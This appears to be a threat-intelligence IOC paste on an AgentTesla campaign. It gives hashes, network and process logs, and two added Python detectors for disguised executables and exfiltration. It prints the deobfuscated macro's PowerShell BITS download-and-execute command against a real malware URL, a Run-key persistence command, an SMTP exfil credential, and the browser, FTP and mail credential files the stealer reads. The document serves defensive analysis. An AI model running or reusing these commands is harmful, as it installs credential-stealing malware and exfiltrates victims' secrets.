- #IOC #OptiData #VR #AgentTesla #X97M #Downloader #Powershell #BITS #exfil587
- https://pastebin.com/fN11F9Gq
- previous_contact:
- 10/02/21 https://pastebin.com/9JXvM5ix
- 07/12/20 https://pastebin.com/20AVUqZ6
- 04/12/20 https://pastebin.com/PYFMBfkg
- 15/06/20 https://pastebin.com/pma5MQAW [!] InstallUtil.exe
- 12/06/20 https://pastebin.com/SKNts0Es
- 29/10/19 https://pastebin.com/RinpBPvy
- 03/09/19 https://pastebin.com/zhJvDz8M
- 09/01/19 https://pastebin.com/MdDfZDdb
- 16/10/18 https://pastebin.com/d5DxTRrB
- 04/10/18 https://pastebin.com/JYShuXn4
- 11/10/18 https://pastebin.com/bkCSvJvM
- FAQ:
- https://radetskiy.wordpress.com/2020/06/15/ioc_agenttesla_150620/
- https://radetskiy.wordpress.com/2018/03/13/ioc_lnk_bits_130318/
- attack_vector
- --------------
- email attach (xls) > macro > powershell > BITS > GET .pdf(EXE) > exfil to 198.54.126.101:587
- email_headers
- --------------
- n/a
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 3762daf78d104add5df228727793ceefd5794c142edd39913be21526ddaeda4c
- File name PO00004423.xls [ Microsoft Excel sheet ]
- File size 124.50 KB (127488 bytes)
- SHA-256 eebbc48f5c8cd470c709c229a4719e5c61ea6b1769b73b397bf110322ea92ae0
- File name IMG_Scanned_6713.pdf [ .NET executable ]
- File size 926.61 KB (948848 bytes)
- SHA-256 4c7ce63cd966e72e5d94f6dc8b0f82cec35b88b1a8d24305c52a7106cdad5ad9
- File name InstallUtil.exe [ .NET executable ] - .NET Framework installation utility [!] correlated with #Agenttesla_150620 https://pastebin.com/pma5MQAW
- File size 39.67 KB (40624 bytes)
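- The two payloads above are tagged [ .NET executable ] although one of them is delivered under a .pdf name. The following is an added example (not part of this paste or the author's tooling) of how to make that call from content alone: parse the DOS/PE headers and test whether the COM descriptor data directory (index 14) is populated, which is what distinguishes a managed image. The sample bytes are constructed minimal PE headers, not the real files; the extension lists are assumptions.

```python
import struct

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
CLR_DIRECTORY_INDEX = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def classify_bytes(data: bytes) -> str:
    """Return 'pdf', 'pe', 'pe-dotnet' or 'unknown' from file content alone."""
    if data.startswith(b"%PDF-"):
        return "pdf"
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "unknown"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "unknown"
    opt = e_lfanew + 24            # 4-byte signature + 20-byte COFF header
    if len(data) < opt + 2:
        return "pe"
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:
        dirs = opt + 96            # data directories start at +96 in PE32
    elif magic == PE32PLUS_MAGIC:
        dirs = opt + 112           # ... and at +112 in PE32+
    else:
        return "pe"
    num_dirs = struct.unpack_from("<I", data, dirs - 4)[0]  # NumberOfRvaAndSizes
    clr_off = dirs + CLR_DIRECTORY_INDEX * 8
    if num_dirs <= CLR_DIRECTORY_INDEX or len(data) < clr_off + 8:
        return "pe"
    rva, size = struct.unpack_from("<II", data, clr_off)
    # A non-empty COM descriptor directory means a managed (.NET) image.
    return "pe-dotnet" if rva and size else "pe"


def check_attachment(name: str, data: bytes) -> dict:
    """Compare the claimed extension with what the bytes actually are."""
    claimed = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    actual = classify_bytes(data)
    executable = actual.startswith("pe")
    return {
        "name": name,
        "claimed": claimed,
        "actual": actual,
        # Assumed list of extensions under which a PE is expected.
        "masquerade": executable and claimed not in ("exe", "dll", "scr", "com"),
    }


def build_sample_pe(dotnet: bool) -> bytes:
    """Constructed minimal PE32 header (no sections); enough for the check above."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                                      # PE32, 16 directories
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, 16)                       # NumberOfRvaAndSizes
    if dotnet:
        struct.pack_into("<II", opt, 96 + CLR_DIRECTORY_INDEX * 8, 0x2008, 0x48)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for name, blob in [("IMG_Scanned_6713.pdf", build_sample_pe(True)),
                       ("invoice.pdf", b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n"),
                       ("setup.exe", build_sample_pe(False))]:
        print(check_attachment(name, blob))
```

- Run it against the real attachment bytes with `check_attachment(name, open(path, "rb").read())`; a `.pdf` that comes back `pe-dotnet` is the case recorded in this paste.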
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR [BITS only!] http://studioartarquitetura.com.br/wp-includes/ID3/1/IMG_Scanned_6713.pdf
- C2 198.54.126.101:587
- netwrk [wireshark_filter: http.request.method==HEAD||http.request.method==GET||ssl||tcp.port==587]
- --------------
- 177.12.164.98 studioartarquitetura.com.br HEAD /wp-includes/ID3/1/IMG_Scanned_6713.pdf HTTP/1.1 Microsoft BITS/7.5
- 177.12.164.98 studioartarquitetura.com.br GET /wp-includes/ID3/1/IMG_Scanned_6713.pdf HTTP/1.1 Microsoft BITS/7.5
- 142.250.102.106 Client Hello
- 142.250.102.106 Application Data
- 198.54.126.101 50809 → 587 [ACK] Seq=1 Ack=1 Win=64240 Len=0
- 198.54.126.101 C: AUTH login User: dHdva2V5c0Bub2JldHR3by54eXo= [base64: twokeys@nobettwo.xyz]
- 198.54.126.101 C: MAIL FROM:<twokeys@nobettwo.xyz>
- comp
- --------------
- svchost.exe 3088 TCP 177.12.164.98 80 ESTABLISHED
- dvaurxb.exe 2820 TCP 142.250.102.106 443 ESTABLISHED
- pou.exe 3952 TCP 142.250.102.106 443 ESTABLISHED
- InstallUtil.exe 252 TCP 198.54.126.101 587 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Import-Module BitsTransfer; Start-BitsTransfer -Source "http://studioartarquitetura.com.br/wp-includes/ID3/1/IMG_Scanned_6713.pdf" -Destination "$env:tmp\\dvaurxb.exe"; Invoke-Item "$env:tmp\\dvaurxb.exe"; exit
- C:\tmp\dvaurxb.exe
- C:\Windows\SysWOW64\cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "htwe" /t REG_SZ /d "C:\Users\operator\AppData\Roaming\pou.exe"
- C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "htwe" /t REG_SZ /d "C:\Users\operator\AppData\Roaming\pou.exe"
- C:\Users\operator\AppData\Roaming\pou.exe
- C:\tmp\InstallUtil.exe
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 09.02.2021 10:15
- htwe E8?:2<6?J;2AB@8 39;:94G29HA?3C:E52EJ>
- c:\users\operator\appdata\roaming\pou.exe 07.05.1979 4:21 [!] 1979 timestamp on a file dropped 09.02.2021
- drop
- --------------
- %temp%\35618171.od
- %temp%\dvaurxb.exe
- %temp%\BITA9C9.tmp
- C:\Users\operator\AppData\Roaming\pou.exe
- %temp%\InstallUtil.exe
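- The proc, netwrk and comp records above contain four detectable steps of this chain: PowerShell pulling a "document" through BITS and executing it from %temp%, REG ADD into HKCU\...\Run, an SMTP AUTH LOGIN whose base64 user names the exfil mailbox, and a non-mail binary holding a TCP 587 session. The following is an added example (not part of this paste or the author's tooling) that runs those checks over the records; the records are re-typed from this paste, while the regexes, the extension lists and the mail-client allowlist are assumptions.

```python
import base64
import re

# Records re-typed from the proc / netwrk / comp sections of this paste.
PROC_LINES = [
    r'C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE',
    r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Import-Module BitsTransfer; '
    r'Start-BitsTransfer -Source "http://studioartarquitetura.com.br/wp-includes/ID3/1/IMG_Scanned_6713.pdf" '
    r'-Destination "$env:tmp\\dvaurxb.exe"; Invoke-Item "$env:tmp\\dvaurxb.exe"; exit',
    r'C:\tmp\dvaurxb.exe',
    r'C:\Windows\SysWOW64\cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" '
    r'/f /v "htwe" /t REG_SZ /d "C:\Users\operator\AppData\Roaming\pou.exe"',
    r'C:\tmp\InstallUtil.exe',
]
NET_LINES = [
    "177.12.164.98 studioartarquitetura.com.br GET /wp-includes/ID3/1/IMG_Scanned_6713.pdf HTTP/1.1 Microsoft BITS/7.5",
    "198.54.126.101 C: AUTH login User: dHdva2V5c0Bub2JldHR3by54eXo=",
    "198.54.126.101 C: MAIL FROM:<twokeys@nobettwo.xyz>",
]
COMP_LINES = [
    "svchost.exe 3088 TCP 177.12.164.98 80 ESTABLISHED",
    "InstallUtil.exe 252 TCP 198.54.126.101 587 ESTABLISHED",
]

# Assumptions: which processes may legitimately use SMTP submission, and which
# extensions count as "document" on the wire vs "executable" on disk.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
DOC_EXT = ("pdf", "doc", "docx", "xls", "xlsx", "jpg", "png")
EXEC_EXT = ("exe", "dll", "scr", "bat", "ps1")

BITS_RE = re.compile(r'Start-BitsTransfer\s+-Source\s+"?(https?://[^\s"]+)"?\s+-Destination\s+"?([^\s"]+)"?', re.I)
EXEC_RE = re.compile(r'(?:Invoke-Item|Start-Process)\s+"?([^\s";]+)', re.I)
RUNKEY_RE = re.compile(r'REG\s+ADD\s+"?(HK\w+\\[^"]*\\Run)"?.*?/v\s+"?([^"\s]+)"?.*?/d\s+"?([^"]+)"?', re.I)
AUTH_RE = re.compile(r'AUTH login User:\s*([A-Za-z0-9+/=]+)')


def ext(path: str) -> str:
    return path.rsplit(".", 1)[-1].lower() if "." in path else ""


def check_download_and_run(cmd: str):
    """BITS fetch of a document-named URL written as an executable and run."""
    m = BITS_RE.search(cmd)
    if not m:
        return None
    url, dest = m.group(1), m.group(2)
    run = EXEC_RE.search(cmd)
    return {"type": "bits_download", "url": url, "dest": dest,
            "executed": bool(run and run.group(1).lower() == dest.lower()),
            "ext_mismatch": ext(url) in DOC_EXT and ext(dest) in EXEC_EXT}


def check_run_key(cmd: str):
    """REG ADD into a Run key pointing at a user-writable location."""
    m = RUNKEY_RE.search(cmd)
    if not m:
        return None
    key, name, target = m.groups()
    low = target.lower()
    return {"type": "run_key", "key": key, "value": name, "target": target,
            "user_writable": "\\appdata\\" in low or "\\temp\\" in low}


def decode_smtp_auth(line: str):
    """Recover the mailbox from the base64 AUTH LOGIN username."""
    m = AUTH_RE.search(line)
    if not m:
        return None
    try:
        user = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None
    return {"type": "smtp_auth", "user": user}


def check_port_587(line: str):
    """Connection to TCP 587 from a process that is not a mail client."""
    parts = line.split()
    if len(parts) < 6 or parts[2] != "TCP" or parts[4] != "587":
        return None
    if parts[0].lower() in MAIL_CLIENTS:
        return None
    return {"type": "smtp_from_nonmail_process", "process": parts[0], "pid": parts[1], "dst": parts[3]}


def triage(proc_lines, net_lines, comp_lines):
    findings = []
    for cmd in proc_lines:
        findings += [f for f in (check_download_and_run(cmd), check_run_key(cmd)) if f]
    findings += [f for f in map(decode_smtp_auth, net_lines) if f]
    findings += [f for f in map(check_port_587, comp_lines) if f]
    return findings


if __name__ == "__main__":
    for finding in triage(PROC_LINES, NET_LINES, COMP_LINES):
        print(finding)
```

- Each check is independent, so any one of them can be lifted into an EDR query or a Sigma rule on its own; the SMTP decode is the one worth keeping close at hand, because the AUTH username is the only place the exfil mailbox appears before MAIL FROM.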
- # # # # # # # #
- additional info
- # # # # # # # #
- Deobfuscated macro
- --------------
- import-module bitstransfer
- start-bitstransfer -source "http://studioartarquitetura.com.br/wp-includes/ID3/1/IMG_Scanned_6713.pdf" -destination "$env:tmp\dvaurxb.exe"
- invoke-item "$env:tmp\dvaurxb.exe"
- exit
- !Steals private information from local Internet browsers
- --------------
- C:\Users\operator\AppData\Roaming\Opera Software\Opera Stable
- C:\Users\operator\AppData\Roaming\Mozilla\Firefox\profiles.ini
- C:\Users\operator\AppData\Roaming\Mozilla\Firefox\Profiles\axdea46y.default\key4.db
- C:\Users\operator\AppData\Roaming\Mozilla\Firefox\Profiles\axdea46y.default\logins.json
- C:\Users\operator\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
- C:\Users\operator\AppData\Roaming\Comodo\IceDragon\profiles.ini
- !Harvests credentials from local FTP client softwares
- --------------
- C:\Users\operator\AppData\Roaming\FTPGetter\servers.xml
- C:\Users\operator\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
- C:\Users\operator\AppData\Roaming\CoreFTP\sites.idx
- !Harvests information related to installed mail clients
- --------------
- C:\Users\operator\AppData\Roaming\Postbox\profiles.ini
- C:\Users\operator\AppData\Roaming\eM Client
- C:\Users\operator\AppData\Roaming\Thunderbird\profiles.ini
- C:\Users\operator\AppData\Roaming\The Bat!
- C:\Users\operator\AppData\Roaming\Claws-mail\clawsrc
- C:\Users\operator\AppData\Roaming\Pocomail\accounts.ini
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/3762daf78d104add5df228727793ceefd5794c142edd39913be21526ddaeda4c/details
- https://www.virustotal.com/gui/file/eebbc48f5c8cd470c709c229a4719e5c61ea6b1769b73b397bf110322ea92ae0/details
- https://analyze.intezer.com/analyses/4a4d284b-c91d-4657-8211-6046d723d0c3
- https://www.virustotal.com/gui/file/4c7ce63cd966e72e5d94f6dc8b0f82cec35b88b1a8d24305c52a7106cdad5ad9/details
- https://analyze.intezer.com/analyses/f1a2a705-c2e6-417f-b855-0eab53ce7973
- VR